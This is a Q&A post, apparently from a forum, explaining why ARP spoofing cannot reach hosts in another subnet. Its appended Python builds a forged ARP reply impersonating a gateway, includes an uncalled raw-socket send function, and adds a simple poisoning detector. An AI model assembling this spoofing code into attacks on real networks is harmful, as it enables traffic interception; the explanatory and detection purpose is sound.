How to perform a MITM attack in another subnet (ARP spoofing & pivoting)


Problem:

So, I have been experimenting with ARP spoofing a little and I would like to try to perform a MITM attack combined with pivoting from one subnet to another. My idea:

I have two subnets. I know all the IP addresses in both of them and they are connected via the same router. Now I would like to either get access to one of the hosts in the other subnet or (if that's possible somehow) join it myself and attack. Since this is not a "real" network, but just one I set up, I know all of the IP addresses and I can most likely configure the router the way I want, which might be useful somehow.

Sadly I'm not that good at networking stuff and I'm not sure how to do this. I have been Googling around a little and quite a lot of people say that this isn't possible. Luckily most of them only talk about ARP spoofing itself (without the pivoting part). Is there a possibility, or does someone have a hint for me where I can look?

Solution:

Assuming the two subnets are on different network segments, and you are not hacking into the router which connects both networks, pivoting won't help you.

As far as I can tell, all pivoting means is using access to an internal system to then gain access to other internal systems. As the systems are on separate networks, you can't use this strategy to jump from one subnet to another, because ARP traffic generally does not cross between network segments (and if it did, you would have had to configure that specifically on the router for an edge case).

On the other hand, if both networks are running on the same segment, you can simply do ARP spoofing without pivoting, as all the machines can see each other's ARP and MAC traffic.
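As an added example (not part of the question or the answer above), the following Python makes the segment argument concrete: it builds a forged ARP reply byte for byte, which shows that the frame carries no IP header and therefore nothing a router could forward; it checks whether a target even sits in the attacker's broadcast domain before any poisoning is attempted; and it runs a small arpwatch-style detector over constructed frames so the defensive side is visible too. Every MAC and IP address is a made-up lab value, and `send_frame` is included only to show how such a frame would be placed on the wire on Linux (AF_PACKET, requires CAP_NET_RAW); it is not called.

```python
import ipaddress
import socket
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806      # EtherType for ARP
HTYPE_ETHERNET = 1
PTYPE_IPV4 = 0x0800
ARP_REQUEST = 1
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def same_broadcast_domain(attacker_ip: str, attacker_netmask: str, target_ip: str) -> bool:
    """ARP frames are never routed, so a forged reply can only poison hosts that share
    the attacker's Layer 2 segment. With the usual one-subnet-per-segment layout this
    reduces to: is the target inside the attacker's own subnet?"""
    net = ipaddress.ip_network(f"{attacker_ip}/{attacker_netmask}", strict=False)
    return ipaddress.ip_address(target_ip) in net


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II + ARP reply telling target_ip that sender_ip lives at sender_mac.
    For a spoof, sender_ip is the address being impersonated (e.g. the gateway) and
    sender_mac is the attacker's own interface."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return ethernet + arp  # 14 + 28 = 42 bytes; there is no IP header anywhere


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet/ARP frame; None for anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


class ArpWatch:
    """Minimal poisoning detector: remember the first MAC seen for each IP and flag
    any later ARP whose sender claims that IP with a different MAC."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.setdefault(ip, mac)  # first sighting is trusted
        if known != mac:
            alert = f"{ip} changed from {known} to {mac}"
            self.alerts.append(alert)
            return alert
        return None


def send_frame(iface: str, frame: bytes) -> int:
    """Put a raw frame on the wire (Linux AF_PACKET; needs CAP_NET_RAW). Not called here."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed lab topology; none of these are real hosts
    ATTACKER_IP, ATTACKER_MAC = "192.168.1.10", "02:00:00:00:00:aa"
    GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "02:00:00:00:00:01"
    VICTIM_IP, VICTIM_MAC = "192.168.1.20", "02:00:00:00:00:14"
    OTHER_SUBNET_HOST = "192.168.2.20"

    print("victim reachable by ARP:", same_broadcast_domain(ATTACKER_IP, "255.255.255.0", VICTIM_IP))
    print("other-subnet host reachable by ARP:",
          same_broadcast_domain(ATTACKER_IP, "255.255.255.0", OTHER_SUBNET_HOST))

    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoof = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    watch = ArpWatch()
    for f in (legit, legit, spoof):
        print(watch.observe(f))
```

The check in `same_broadcast_domain` is the whole point of the answer: the spoofed frame addresses the victim by MAC and carries only link-layer fields, so a host in 192.168.2.0/24 behind the router never sees it. The detector is deliberately naive (a first-seen MAC is trusted, and legitimate NIC replacements also trip it); production tools such as arpwatch add timing and allow-lists on top of the same idea.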
